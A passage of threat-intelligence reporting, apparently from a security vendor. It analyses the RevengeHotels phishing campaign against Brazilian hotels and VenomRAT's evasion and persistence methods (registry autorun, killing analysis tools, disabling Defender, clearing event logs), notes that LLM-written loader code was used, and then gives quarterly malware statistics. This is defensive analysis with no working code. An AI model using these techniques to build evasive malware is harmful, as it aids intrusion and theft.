Later, this threat group expanded its arsenal by adding XWorm, a RAT with commands for control, data theft, and persistence, amongst other things. While investigating the campaign that distributed XWorm, we identified high-confidence indicators that RevengeHotels also used the RAT tool named DesckVBRAT in their operations.

In the summer of 2025, we observed new campaigns targeting the same sector and featuring increasingly sophisticated implants and tools. The threat actors continue to employ phishing emails with invoice themes to deliver VenomRAT implants via JavaScript loaders and PowerShell downloaders. A significant portion of the initial infector and downloader code in this campaign appears to be generated by large language model (LLM) agents. This suggests that the threat actor is now leveraging AI to evolve its capabilities, a trend also reported among other cybercriminal groups.

The primary targets of these campaigns are Brazilian hotels, although we have also observed attacks directed at Spanish-speaking markets. Through a comprehensive analysis of the attack patterns and the threat actor’s modus operandi, we have established with high confidence that the responsible actor is indeed RevengeHotels. The consistency of the tactics, techniques, and procedures (TTPs) employed in these attacks aligns with the known behavior of RevengeHotels. The infrastructure used for payload delivery relies on legitimate hosting services, often utilizing Portuguese-themed domain names.

Initial infection

The primary attack vector employed by RevengeHotels is phishing emails with invoicing themes, which urge the recipient to settle overdue payments. These emails are specifically targeted at email addresses associated with hotel reservations. While Portuguese is a common language used in these phishing emails, we have also discovered instances of Spanish-language phishing emails, indicating that the threat actor’s scope extends beyond Brazilian hospitality establishments and may include targets in Spanish-speaking countries or regions.

In recent instances of these attacks, the themes have shifted from hotel reservations to fake job applications, where attackers sent résumés in an attempt to exploit potential job opportunities at the targeted hotels.

Malicious implant

The malicious websites, which change with each email, download a WScript JS file upon being visited, triggering the infection process. The filename of the JS file changes with every request. In the case at hand, we analyzed Fat146571.js (fbadfff7b61d820e3632a2f464079e8c), which follows the format Fat\{NUMBER\}.js, where “Fat” is the beginning of the Portuguese word “fatura”, meaning “invoice”.

The script appears to be generated by a large language model (LLM), as evidenced by its heavily commented code and a format similar to those produced by this type of technology. The primary function of the script is to load subsequent scripts that facilitate the infection.

A significant portion of the new generation of initial infectors created by RevengeHotels contains code that seems to have been generated by AI. These LLM-generated code segments can be distinguished from the original malicious code by several characteristics, including:

• The cleanliness and organization of the code
• Placeholders, which allow the threat actor to insert their own variables or content
• Detailed comments that accompany almost every action within the code
• A notable lack of obfuscation, which sets these LLM-generated sections apart from the rest of the code

Second loading step

Upon execution, the loader script, Fat\{NUMBER\}.js, decodes an obfuscated and encoded buffer, which serves as the next step in loading the remaining malicious implants. This buffer is then saved to a PowerShell (PS1) file named SGDoHBZQWpLKXCAoTHXdBGlnQJLZCGBOVGLH_{TIMESTAMP}.ps1 (d5f241dee73cffe51897c15f36b713cc), where “\{TIMESTAMP\}” is a generated number based on the current execution date and time. This ensures that the filename changes with each infection and is not persistent. Once the script is saved, it is executed three times, after which the loader script exits.

The script SGDoHBZQWpLKXCAoTHXdBGlnQJLZCGBOVGLH_{TIMESTAMP}.ps1 runs a PowerShell command with Base64-encoded code. This code retrieves the cargajecerrr.txt (b1a5dc66f40a38d807ec8350ae89d1e4) file from a remote malicious server and invokes it as PowerShell.

This downloader, which is lightly obfuscated, is responsible for fetching the remaining files from the malicious server and loading them. Both downloaded files are Base64-encoded and have descriptive names: venumentrada.txt (607f64b56bb3b94ee0009471f1fe9a3c), which can be interpreted as “VenomRAT entry point”, and runpe.txt (dbf5afa377e3e761622e5f21af1f09e6), which is named after a malicious tool for in-memory execution. The first file, venumentrada.txt, is a heavily obfuscated loader (MD5 of the decoded file: 91454a68ca3a6ce7cb30c9264a88c0dc) that ensures the second file, a VenomRAT implant (3ac65326f598ee9930031c17ce158d3d), is correctly executed in memory.

The malicious code also exhibits characteristics consistent with generation by an AI interface, including a coherent code structure, detailed commenting, and explicit variable naming. Moreover, it differs significantly from previous samples, which had a structurally different, more obfuscated nature and lacked comments.

Exploring VenomRAT

VenomRAT, an evolution of the open-source QuasarRAT, was first discovered in mid-2020 and is offered on the dark web, with a lifetime license costing up to $650. Although the source code of VenomRAT was leaked, it is still being sold and used by threat actors.

According to the vendor’s website, VenomRAT offers a range of capabilities that build upon and expand those of QuasarRAT, including HVNC hidden desktop, file grabber and stealer, reverse proxy, and UAC exploit, amongst others.

As with other RATs, VenomRAT clients are generated with custom configurations. The configuration data within the implant (similar to QuasarRAT) is encrypted using AES and PKCS #5 v2.0, with two keys employed: one for decrypting the data and another for verifying its authenticity using HMAC-SHA256. Throughout the malware code, different sets of keys and initialization vectors are used sporadically, but they consistently implement the same AES algorithm.

Anti-kill

It is notable that VenomRAT features an anti-kill protection mechanism, which can be enabled by the threat actor upon execution. Initially, the RAT calls a function named EnableProtection, which retrieves the security descriptor of the malicious process and modifies the Discretionary Access Control List (DACL) to remove any permissions that could hinder the RAT’s proper functioning or shorten its lifespan on the system.

The second component of this anti-kill measure involves a thread that runs a continuous loop, checking the list of running processes every 50 milliseconds. The loop specifically targets those processes commonly used by security analysts and system administrators to monitor host activity or analyze .NET binaries, among other tasks. If the RAT detects any of these processes, it will terminate them without prompting the user.

The anti-kill measure also involves persistence, which is achieved through two mechanisms written into a VBS file generated and executed by VenomRAT. These mechanisms ensure the malware’s continued presence on the system:

1. Windows Registry: The script creates a new key under HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce, pointing to the executable path. This allows the malware to persist across user sessions.
2. Process: The script runs a loop that checks for the presence of the malware process in the process list. If it is not found, the script executes the malware again.

If the user who executed the malware has administrator privileges, the malware takes additional steps to ensure its persistence. It sets the SeDebugPrivilege token, enabling it to use the RtlSetProcessIsCritical function to mark itself as a critical system process. This makes the process “essential” to the system, allowing it to persist even when termination is attempted. However, when the administrator logs off or the computer is about to shut down, VenomRAT removes its critical mark to permit the system to proceed with these actions.

As a final measure to maintain persistence, the RAT calls the SetThreadExecutionState function with a set of flags that forces the display to remain on and the system to stay in a working state. This prevents the system from entering sleep mode.

Separately from the anti-kill methods, the malware also includes a protection mechanism against Windows Defender. In this case, the RAT actively searches for MSASCui.exe in the process list and terminates it. The malware then modifies the task scheduler and registry to disable Windows Defender globally, along with its various features.

Networking

VenomRAT employs a custom packet building and serialization mechanism for its networking connection to the C2 server. Each packet is tailored to a specific action taken by the RAT, with a dedicated packet handler for each action. The packets transmitted to the C2 server undergo a multi-step process:

1. The packet is first serialized to prepare it for transmission.
2. The serialized packet is then compressed using LZMA compression to reduce its size.
3. The compressed packet is encrypted using AES-128 encryption, utilizing the same key and authentication key mentioned earlier.

Upon receiving packets from the C2 server, VenomRAT reverses this process to decrypt and extract the contents.

Additionally, VenomRAT implements tunneling by installing ngrok on the infected computer. The C2 server specifies the token, protocol, and port for the tunnel, which are sent in the serialized packet. This allows remote control services like RDP and VNC to operate through the tunnel and to be exposed to the internet.

USB spreading

VenomRAT also possesses the capability to spread via USB drives. To achieve this, it scans drive letters from C to M and checks if each drive is removable. If a removable drive is detected, the RAT copies itself to all available drives under the name My Pictures.exe.

Extra stealth steps

In addition to copying itself to another directory and changing its executable name, VenomRAT employs several stealth techniques that distinguish it from QuasarRAT. Two notable examples include:

• Deletion of Zone.Identifier streams: VenomRAT deletes the Mark of the Web streams, which contain metadata about the URL from which the executable was downloaded. By removing this information, the RAT can evade detection by security tools like Windows Defender and avoid being quarantined, while also eliminating its digital footprint.
• Clearing Windows event logs: The malware clears all Windows event logs on the compromised system, effectively creating a “clean slate” for its operations. This action ensures that any events generated during the RAT’s execution are erased, making it more challenging for security analysts to detect and track its activities.

Victimology

The primary targets of RevengeHotels attacks continue to be hotels and front desks, with a focus on establishments located in Brazil. However, the threat actors have been adapting their tactics, and phishing emails are now being sent in languages other than Portuguese. Specifically, we’ve observed that emails in Spanish are being used to target hotels and tourism companies in Spanish-speaking countries, indicating a potential expansion of the threat actor’s scope. Note that among earlier victims of this threat are such Spanish-speaking countries as Argentina, Bolivia, Chile, Costa Rica, Mexico, and Spain.

It is important to point out that previously reported campaigns have mentioned the threat actor targeting hotel front desks globally, particularly in Russia, Belarus, and Turkey, although no such activity has yet been detected during the latest RevengeHotels campaign.

Conclusions

RevengeHotels has significantly enhanced its capabilities, developing new tactics to target the hospitality and tourism sectors. With the assistance of LLM agents, the group has been able to generate and modify their phishing lures, expanding their attacks to new regions. The websites used for these attacks are constantly rotating, and the initial payloads are continually changing, but the ultimate objective remains the same: to deploy a remote access Trojan (RAT). In this case, the RAT in question is VenomRAT, a privately developed variant of the open-source QuasarRAT.

Kaspersky products detect these threats as HEUR:Trojan-Downloader.Script.Agent.gen, HEUR:Trojan.Win32.Generic, HEUR:Trojan.MSIL.Agent.gen, Trojan-Downloader.PowerShell.Agent.ady, Trojan.PowerShell.Agent.aqx.

Indicators of compromise

fbadfff7b61d820e3632a2f464079e8c Fat146571.js
d5f241dee73cffe51897c15f36b713cc SGDoHBZQWpLKXCAoTHXdBGlnQJLZCGBOVGLH_{TIMESTAMP}.ps1
1077ea936033ee9e9bf444dafb55867c cargajecerrr.txt
b1a5dc66f40a38d807ec8350ae89d1e4 cargajecerrr.txt
dbf5afa377e3e761622e5f21af1f09e6 runpe.txt
607f64b56bb3b94ee0009471f1fe9a3c venumentrada.txt
3ac65326f598ee9930031c17ce158d3d deobfuscated runpe.txt
91454a68ca3a6ce7cb30c9264a88c0dc deobfuscated venumentrada.txt

IT threat evolution in Q2 2025. Mobile statistics
IT threat evolution in Q2 2025. Non-mobile statistics

The mobile section of our quarterly cyberthreat report includes statistics on malware, adware, and potentially unwanted software for Android, as well as descriptions of the most notable threats for Android and iOS discovered during the reporting period. The statistics in this report are based on detection alerts from Kaspersky products, collected from users who consented to provide anonymized data to Kaspersky Security Network.

Quarterly figures

According to Kaspersky Security Network, in Q2 2025:

• Our solutions blocked 10.71 million malware, adware, and unwanted mobile software attacks.
• Trojans, the most common mobile threat, affected 31.69% of Kaspersky users who encountered mobile threats during the reporting period.
• Just under 143,000 malicious installation packages were detected, of which:
  • 42,220 were mobile banking Trojans;
  • 695 packages were mobile ransomware Trojans.

Quarterly highlights

Mobile attacks involving malware, adware, and unwanted software dropped to 10.71 million.

Attacks on users of Kaspersky mobile solutions, Q4 2023 — Q2 2025 (download)

The trend is mainly due to a decrease in the activity of RiskTool.AndroidOS.SpyLoan. These are applications typically associated with microlenders and containing a potentially dangerous framework for monitoring borrowers and collecting their data, such as contacts lists. Curiously, such applications have been found pre-installed on some devices.

In Q2, we found a new malicious app for Android and iOS that was stealing images from the gallery. We were able to determine that this campaign was linked to the previously discovered SparkCat, so we dubbed it SparkKitty.

Like its “big brother”, the new malware most likely targets recovery codes for crypto wallets saved as screenshots.

Trojan-DDoS.AndroidOS.Agent.a was this past quarter’s unusual discovery. Malicious actors embedded an SDK for conducting dynamically configurable DDoS attacks into apps designed for viewing adult content. The Trojan allows for sending specific data to addresses designated by the attacker at a set frequency. Building a DDoS botnet from mobile devices with adult apps installed may seem like a questionable venture in terms of attack efficiency and power – but apparently, some cybercriminals have found a use for this approach.

In Q2, we also encountered Trojan-Spy.AndroidOS.OtpSteal.a, a fake VPN client that hijacks user accounts. Instead of the advertised features, it uses the Notification Listener service to intercept OTP codes from various messaging apps and social networks, and sends them to the attackers’ Telegram chat via a bot.

Mobile threat statistics

The number of Android malware and potentially unwanted app samples decreased from Q1, reaching a total of 142,762 installation packages.

Detected malware and potentially unwanted app installation packages, Q2 2024 — Q2 2025 (download)

The distribution of detected installation packages by type in Q2 was as follows:

Detected mobile malware by type, Q1 — Q2 2025 (download)

* Data for the previous quarter may differ slightly from previously published data due to some verdicts being retrospectively revised.

Banking Trojans remained in first place, with their share increasing relative to Q1. The Mamont family continues to dominate this category. In contrast, spy Trojans dropped to fifth place as the surge in the number of APK files for the SMS-stealing Trojan-Spy.AndroidOS.Agent.akg subsided. The number of Agent.amw spyware files, which masquerade as casino apps, also decreased.

RiskTool-type unwanted apps and adware ranked second and third, respectively, while Trojans – with most files belonging to the Triada family – occupied the fourth place.

Share* of users attacked by the given type of malicious or potentially unwanted apps out of all targeted users of Kaspersky mobile products, Q1 — Q2 2025 (download)

* The total may exceed 100% if the same users experienced multiple attack types.

The distribution of attacked users remained close to that of the previous quarter. The increase in the share of backdoors is linked to the discovery of Backdoor.Triada.z, which came pre-installed on devices. As for adware, the proportion of users affected by the HiddenAd family has grown.

TOP 20 most frequently detected types of mobile malware

Note that the malware rankings below exclude riskware or potentially unwanted software, such as RiskTool or adware.

Verdict	%* Q1 2025	%* Q2 2025	Difference (p.p.)	Change in rank
Trojan.AndroidOS.Fakemoney.v	26.41	14.57	-11.84	0
Trojan-Banker.AndroidOS.Mamont.da	11.21	12.42	+1.20	+2
Backdoor.AndroidOS.Triada.z	4.71	10.29	+5.58	+3
Trojan.AndroidOS.Triada.fe	3.48	7.16	+3.69	+4
Trojan-Banker.AndroidOS.Mamont.ev	0.00	6.97	+6.97
Trojan.AndroidOS.Triada.gn	2.68	6.54	+3.86	+3
Trojan-Banker.AndroidOS.Mamont.db	16.00	5.50	-10.50	-4
Trojan-Banker.AndroidOS.Mamont.ek	1.83	5.09	+3.26	+7
DangerousObject.Multi.Generic.	19.30	4.21	-15.09	-7
Trojan-Banker.AndroidOS.Mamont.eb	1.59	2.58	+0.99	+7
Trojan.AndroidOS.Triada.hf	3.81	2.41	-1.40	-4
Trojan-Downloader.AndroidOS.Dwphon.a	2.19	2.24	+0.05	0
Trojan-Banker.AndroidOS.Mamont.ef	2.44	2.20	-0.24	-2
Trojan-Banker.AndroidOS.Mamont.es	0.05	2.13	+2.08
Trojan-Banker.AndroidOS.Mamont.dn	1.46	2.13	+0.67	+5
Trojan-Downloader.AndroidOS.Agent.mm	1.45	1.56	+0.11	+6
Trojan-Banker.AndroidOS.Agent.rj	1.86	1.45	-0.42	-3
Trojan-Banker.AndroidOS.Mamont.ey	0.00	1.42	+1.42
Trojan-Banker.AndroidOS.Mamont.bc	7.61	1.39	-6.23	-14
Trojan.AndroidOS.Boogr.gsh	1.41	1.36	-0.06	+3

* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky mobile solutions.

The activity of Fakemoney scam apps noticeably decreased in Q2, but they still held the top position. Almost all the other entries on the list are variants of the popular banking Trojan Mamont, pre-installed Trojans like Triada and Dwphon, and modified messaging apps with the Triada Trojan built in (Triada.fe, Triada.gn, Triada.ga, and Triada.gs).

Region-specific malware

This section describes malware types that mostly affected specific countries.

Verdict	Country*	%**
Trojan-Banker.AndroidOS.Coper.c	Türkiye	98.65
Trojan-Banker.AndroidOS.Coper.a	Türkiye	97.78
Trojan-Dropper.AndroidOS.Rewardsteal.h	India	95.62
Trojan-Banker.AndroidOS.Rewardsteal.lv	India	95.48
Trojan-Dropper.AndroidOS.Agent.sm	Türkiye	94.52
Trojan.AndroidOS.Fakeapp.hy	Uzbekistan	86.51
Trojan.AndroidOS.Piom.bkzj	Uzbekistan	85.83
Trojan-Dropper.AndroidOS.Pylcasa.c	Brazil	83.06

* The country where the malware was most active.
** Unique users who encountered this Trojan variant in the indicated country as a percentage of all Kaspersky mobile security solution users attacked by the same variant.

In addition to the typical banking Trojans for this category – Coper, which targets users in Türkiye, and Rewatrdsteal, active in India – the list also includes the fake job search apps Fakeapp.hy and Piom.bkzj, which specifically target Uzbekistan. Both families collect the user’s personal data. Meanwhile, new droppers named “Pylcasa” operated in Brazil. They infiltrate Google Play by masquerading as simple apps, such as calculators, but once launched, they open a URL provided by malicious actors – similar to Trojans of the Fakemoney family. These URLs may lead to illegal casino websites or phishing pages.

Mobile banking Trojans

The number of banking Trojans detected in Q2 2025 was slightly lower than in Q1 but still significantly exceeded the figures for 2024. Kaspersky solutions detected a total of 42,220 installation packages of this type.

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q2 2024 — Q2 2025 (download)

The bulk of mobile banking Trojan installation packages still consists of various modifications of Mamont, which account for 57.7%. In terms of the share of affected users, Mamont also outpaced all its competitors, occupying nearly all the top spots on the list of the most widespread banking Trojans.

TOP 10 mobile bankers

Verdict	%* Q1 2025	%* Q2 2025	Difference (p.p.)	Change in rank
Trojan-Banker.AndroidOS.Mamont.da	26.68	30.28	+3.59	+1
Trojan-Banker.AndroidOS.Mamont.ev	0.00	17.00	+17.00
Trojan-Banker.AndroidOS.Mamont.db	38.07	13.41	-24.66	-2
Trojan-Banker.AndroidOS.Mamont.ek	4.37	12.42	+8.05	+2
Trojan-Banker.AndroidOS.Mamont.eb	3.80	6.29	+2.50	+2
Trojan-Banker.AndroidOS.Mamont.ef	5.80	5.36	-0.45	-2
Trojan-Banker.AndroidOS.Mamont.es	0.12	5.20	+5.07	+23
Trojan-Banker.AndroidOS.Mamont.dn	3.48	5.20	+1.72	+1
Trojan-Banker.AndroidOS.Agent.rj	4.43	3.53	-0.90	-4
Trojan-Banker.AndroidOS.Mamont.ey	0.00	3.47	+3.47	9

Conclusion

In Q2 2025, the number of attacks involving malware, adware, and unwanted software decreased compared to Q1. At the same time, Trojans and banking Trojans remained the most common threats, particularly the highly active Mamont family. Additionally, the quarter was marked by the discovery of the second spyware Trojan of 2025 to infiltrate the App Store, along with a fake VPN client stealing OTP codes and a DDoS bot concealed within porn-viewing apps.

IT threat evolution in Q2 2025. Non-mobile statistics
IT threat evolution in Q2 2025. Mobile statistics

The statistics in this report are based on detection verdicts returned by Kaspersky products unless otherwise stated. The information was provided by Kaspersky users who consented to sharing statistical data.

The quarter in numbers

In Q2 2025:

• Kaspersky solutions blocked more than 471 million attacks originating from various online resources.
• Web Anti-Virus detected 77 million unique links.
• File Anti-Virus blocked nearly 23 million malicious and potentially unwanted objects.
• There were 1,702 new ransomware modifications discovered.
• Just under 86,000 users were targeted by ransomware attacks.
• Of all ransomware victims whose data was published on threat actors’ data leak sites (DLS), 12% were victims of Qilin.
• Almost 280,000 users were targeted by miners.

Ransomware

Quarterly trends and highlights

Law enforcement success

The alleged malicious actor behind the Black Kingdom ransomware attacks was indicted in the U.S. The Yemeni national is accused of infecting about 1,500 computers in the U.S. and other countries through vulnerabilities in Microsoft Exchange. He also stands accused of demanding a ransom of $10,000 in bitcoin, which is the amount victims saw in the ransom note. He is also alleged to be the developer of the Black Kingdom ransomware.

A Ukrainian national was extradited to the U.S. in the Nefilim case. He was arrested in Spain in June 2024 on charges of distributing ransomware and extorting victims. According to the investigation, he had been part of the Nefilim Ransomware-as-a-Service (RaaS) operation since 2021, targeting high-revenue organizations. Nefilim uses the classic double extortion scheme: cybercriminals steal the victim’s data, encrypt it, then threaten to publish it online.

Also arrested was a member of the Ryuk gang, charged with organizing initial access to victims’ networks. The accused was apprehended in Kyiv in April 2025 at the request of the FBI and extradited to the U.S. in June.

A man suspected of being involved in attacks by the DoppelPaymer gang was arrested. In a joint operation by law enforcement in the Netherlands and Moldova, the 45-year-old was arrested in May. He is accused of carrying out attacks against Dutch organizations in 2021. Authorities seized around €84,800 and several devices.

A 39-year-old Iranian national pleaded guilty to participating in RobbinHood ransomware attacks. Among the targets of the attacks, which took place from 2019 to 2024, were U.S. local government agencies, healthcare providers, and non-profit organizations.

Vulnerabilities and attacks

Mass exploitation of a vulnerability in SAP NetWeaver

In May, it was revealed that several ransomware gangs, including BianLian and RansomExx, had been exploiting CVE-2025-31324 in SAP NetWeaver software. Successful exploitation of this vulnerability allows attackers to upload malicious files without authentication, which can lead to a complete system compromise.

Attacks via the SimpleHelp remote administration tool

The DragonForce group compromised an MSP provider, attacking its clients with the help of the SimpleHelp remote administration tool. According to researchers, the attackers exploited a set of vulnerabilities (CVE-2024-57727, CVE-2024-57728, CVE-2024-57726) in the software to launch the DragonForce ransomware on victims’ hosts.

Qilin exploits vulnerabilities in Fortinet

In June, news broke that the Qilin gang (also known as Agenda) was actively exploiting critical vulnerabilities in Fortinet devices to infiltrate corporate networks. The attackers allegedly exploited the vulnerabilities CVE-2024-21762 and CVE-2024-55591 in FortiGate software, which allowed them to bypass authentication and execute malicious code remotely. After gaining access, the cybercriminals encrypted data on systems within the corporate network and demanded a ransom.

Exploitation of a Windows CLFS vulnerability

April saw the detection of attacks that leveraged CVE-2025-29824, a zero-day vulnerability in the Windows Common Log File System (CLFS) driver, a core component of the Windows OS. This vulnerability allows an attacker to elevate privileges on a compromised system. Researchers have linked these incidents to the RansomExx and Play gangs. The attackers targeted companies in North and South America, Europe, and the Middle East.

The most prolific groups

This section highlights the most prolific ransomware gangs by number of victims added to each group’s DLS during the reporting period. In the second quarter, Qilin (12.07%) proved to be the most prolific group. RansomHub, the leader of 2024 and the first quarter of 2025, seems to have gone dormant since April. Clop (10.83%) and Akira (8.53%) swapped places compared to the previous reporting period.

Number of each group’s victims according to its DLS as a percentage of all groups’ victims published on all the DLSs under review during the reporting period (download)

Number of new variants

In the second quarter, Kaspersky solutions detected three new families and 1,702 new ransomware variants. This is significantly fewer than in the previous reporting period. The decrease is linked to the renewed decline in the count of the Trojan-Ransom.Win32.Gen verdicts, following a spike last quarter.

Number of new ransomware modifications, Q2 2024 — Q2 2025 (download)

Number of users attacked by ransomware Trojans

Our solutions protected a total of 85,702 unique users from ransomware during the second quarter.

Number of unique users attacked by ransomware Trojans, Q2 2025 (download)

Geography of attacked users

TOP 10 countries and territories attacked by ransomware Trojans

	Country/territory*	%**
1	Libya	0.66
2	China	0.58
3	Rwanda	0.57
4	South Korea	0.51
5	Tajikistan	0.49
6	Bangladesh	0.45
7	Iraq	0.45
8	Pakistan	0.38
9	Brazil	0.38
10	Tanzania	0.35

* Excluded are countries and territories with relatively few (under 50,000) Kaspersky users.
** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country/territory.

TOP 10 most common families of ransomware Trojans

	Name	Verdict	%*
1	(generic verdict)	Trojan-Ransom.Win32.Gen	23.33
2	WannaCry	Trojan-Ransom.Win32.Wanna	7.80
3	(generic verdict)	Trojan-Ransom.Win32.Encoder	6.25
4	(generic verdict)	Trojan-Ransom.Win32.Crypren	6.24
5	(generic verdict)	Trojan-Ransom.Win32.Agent	3.75
6	Cryakl/CryLock	Trojan-Ransom.Win32.Cryakl	3.34
7	PolyRansom/VirLock	Virus.Win32.PolyRansom / Trojan-Ransom.Win32.PolyRansom	3.03
8	(generic verdict)	Trojan-Ransom.Win32.Crypmod	2.81
9	(generic verdict)	Trojan-Ransom.Win32.Phny	2.78
10	(generic verdict)	Trojan-Ransom.MSIL.Agent	2.41

* Unique Kaspersky users attacked by the specific ransomware Trojan family as a percentage of all unique users attacked by this type of threat.

Miners

Number of new variants

In the second quarter of 2025, Kaspersky solutions detected 2,245 new modifications of miners.

Number of new miner modifications, Q2 2025 (download)

Number of users attacked by miners

During the second quarter, we detected attacks using miner programs on the computers of 279,630 unique Kaspersky users worldwide.

Number of unique users attacked by miners, Q2 2025 (download)

Geography of attacked users

TOP 10 countries and territories attacked by miners

	Country/territory*	%**
1	Senegal	3.49
2	Panama	1.31
3	Kazakhstan	1.11
4	Ethiopia	1.02
5	Belarus	1.01
6	Mali	0.96
7	Tajikistan	0.88
8	Tanzania	0.80
9	Moldova	0.80
10	Dominican Republic	0.80

* Excluded are countries and territories with relatively few (under 50,000) Kaspersky users.
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country/territory.

Attacks on macOS

Among the threats to macOS, one of the biggest discoveries of the second quarter was the PasivRobber family. This spyware consists of a huge number of modules designed to steal data from QQ, WeChat, and other messaging apps and applications that are popular mainly among Chinese users. Its distinctive feature is that the spyware modules get embedded into the target process when the device goes into sleep mode.

Closer to the middle of the quarter, several reports (1, 2, 3) emerged about attackers stepping up their activity, posing as victims’ trusted contacts on Telegram and convincing them to join a Zoom call. During or before the call, the user was persuaded to run a seemingly Zoom-related utility, but which was actually malware. The infection chain led to the download of a backdoor written in the Nim language and bash scripts that stole data from browsers.

TOP 20 threats to macOS

* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky security solutions for macOS (download)

* Data for the previous quarter may differ slightly from previously published data due to some verdicts being retrospectively revised.

A new piece of spyware named PasivRobber, discovered in the second quarter, immediately became the most widespread threat, attacking more users than the fake cleaners and adware typically seen on macOS. Also among the most common threats were the password- and crypto wallet-stealing Trojan Amos and the general detection Trojan.OSX.Agent.gen, which we described in our previous report.

Geography of threats to macOS

TOP 10 countries and territories by share of attacked users

Country/territory	%* Q1 2025	%* Q2 2025
Mainland China	0.73%	2.50%
France	1.52%	1.08%
Hong Kong	1.21%	0.84%
India	0.84%	0.76%
Mexico	0.85%	0.76%
Brazil	0.66%	0.70%
Germany	0.96%	0.69%
Singapore	0.32%	0.63%
Russian Federation	0.50%	0.41%
South Korea	0.10%	0.32%

* Unique users who encountered threats to macOS as a percentage of all unique Kaspersky users in the country/territory.

IoT threat statistics

This section presents statistics on attacks targeting Kaspersky IoT honeypots. The geographic data on attack sources is based on the IP addresses of attacking devices.

In the second quarter of 2025, there was another increase in both the share of attacks using the Telnet protocol and the share of devices connecting to Kaspersky honeypots via this protocol.

Distribution of attacked services by number of unique IP addresses of attacking devices (download)

Distribution of attackers’ sessions in Kaspersky honeypots (download)

TOP 10 threats delivered to IoT devices

Share of each threat delivered to an infected device as a result of a successful attack, out of the total number of threats delivered (download)

In the second quarter, the share of the NyaDrop botnet among threats delivered to our honeypots grew significantly to 30.27%. Conversely, the number of Mirai variants on the list of most common malware decreased, as did the share of most of them. Additionally, after a spike in the first quarter, the share of BitCoinMiner miners dropped to 1.57%.

During the reporting period, the list of most common IoT threats expanded with new families. The activity of the Agent.nx backdoor (4.48%), controlled via P2P through the BitTorrent DHT distributed hash table, grew markedly. Another newcomer to the list, Prometei, is a Linux version of a Windows botnet that was first discovered in December 2020.

Attacks on IoT honeypots

Geographically speaking, the percentage of SSH attacks originating from Germany and the U.S. increased sharply.

Country/territory	Q1 2025	Q2 2025
Germany	1.60%	24.58%
United States	5.52%	10.81%
Russian Federation	9.16%	8.45%
Australia	2.75%	8.01%
Seychelles	1.32%	6.54%
Bulgaria	1.25%	3.66%
The Netherlands	0.63%	3.53%
Vietnam	2.27%	3.00%
Romania	1.34%	2.92%
India	19.16%	2.89%

The share of Telnet attacks originating from China and India remained high, with more than half of all attacks on Kaspersky honeypots coming from these two countries combined.

Country/territory	Q1 2025	Q2 2025
China	39.82%	47.02%
India	30.07%	28.08%
Indonesia	2.25%	5.54%
Russian Federation	5.14%	4.85%
Pakistan	3.99%	3.58%
Brazil	12.03%	2.35%
Nigeria	3.01%	1.66%
Germany	0.09%	1.47%
United States	0.68%	0.75%
Argentina	0.01%	0.70%

Attacks via web resources

The statistics in this section are based on detection verdicts by Web Anti-Virus, which protects users when suspicious objects are downloaded from malicious or infected web pages. Cybercriminals create malicious pages with a goal in mind. Websites that host user-generated content, such as message boards, as well as compromised legitimate sites, can become infected.

Countries that served as sources of web-based attacks: TOP 10

This section gives the geographical distribution of sources of online attacks blocked by Kaspersky products: web pages that redirect to exploits; sites that host exploits and other malware; botnet C2 centers, and the like. Any unique host could be the source of one or more web-based attacks.

To determine the geographic source of web attacks, we matched the domain name with the real IP address where the domain is hosted, then identified the geographic location of that IP address (GeoIP).

In the second quarter of 2025, Kaspersky solutions blocked 471,066,028 attacks from internet resources worldwide. Web Anti-Virus responded to 77,371,384 unique URLs.

Web-based attacks by country, Q2 2025 (download)

Countries and territories where users faced the greatest risk of online infection

To assess the risk of malware infection via the internet for users’ computers in different countries and territories, we calculated the share of Kaspersky users in each location who experienced a Web Anti-Virus alert during the reporting period. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.

This ranked list includes only attacks by malicious objects classified as Malware. Our calculations leave out Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

	Country/territory*	%**
1	Bangladesh	10.85
2	Tajikistan	10.70
3	Belarus	8.96
4	Nepal	8.45
5	Algeria	8.21
6	Moldova	8.16
7	Turkey	8.08
8	Qatar	8.07
9	Albania	8.03
10	Hungary	7.96
11	Tunisia	7.95
12	Portugal	7.93
13	Greece	7.90
14	Serbia	7.84
15	Bulgaria	7.79
16	Sri Lanka	7.72
17	Morocco	7.70
18	Georgia	7.68
19	Peru	7.63
20	North Macedonia	7.58

* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.
** Unique users targeted by Malware attacks as a percentage of all unique users of Kaspersky products in the country.

On average during the quarter, 6.36% of internet users’ computers worldwide were subjected to at least one Malware web-based attack.

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer by infecting files or removable media, or initially made their way onto the computer in non-open form. Examples of the latter are programs in complex installers and encrypted files.

Data in this section is based on analyzing statistics produced by anti-virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The statistics are based on detection verdicts from the On-Access Scan (OAS) and On-Demand Scan (ODS) modules of File Anti-Virus. This includes malware found directly on user computers or on connected removable media: flash drives, camera memory cards, phones, and external hard drives.

In the second quarter of 2025, our File Anti-Virus recorded 23,260,596 malicious and potentially unwanted objects.

Countries and territories where users faced the highest risk of local infection

For each country and territory, we calculated the percentage of Kaspersky users whose devices experienced a File Anti-Virus triggering at least once during the reporting period. This statistic reflects the level of personal computer infection in different countries and territories around the world.

Note that this ranked list includes only attacks by malicious objects classified as Malware. Our calculations leave out File Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

	Country/territory*	%**
1	Turkmenistan	45.26
2	Afghanistan	34.95
3	Tajikistan	34.43
4	Yemen	31.95
5	Cuba	30.85
6	Uzbekistan	28.53
7	Syria	26.63
8	Vietnam	24.75
9	South Sudan	24.56
10	Algeria	24.21
11	Bangladesh	23.79
12	Belarus	23.67
13	Gabon	23.37
14	Niger	23.35
15	Cameroon	23.10
16	Tanzania	22.77
17	China	22.74
18	Iraq	22.47
19	Burundi	22.30
20	Congo	21.84

* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.
** Unique users on whose computers Malware local threats were blocked, as a percentage of all unique users of Kaspersky products in the country/territory.

Overall, 12.94% of user computers globally faced at least one Malware local threat during the second quarter.
The figure for Russia was 14.27%.

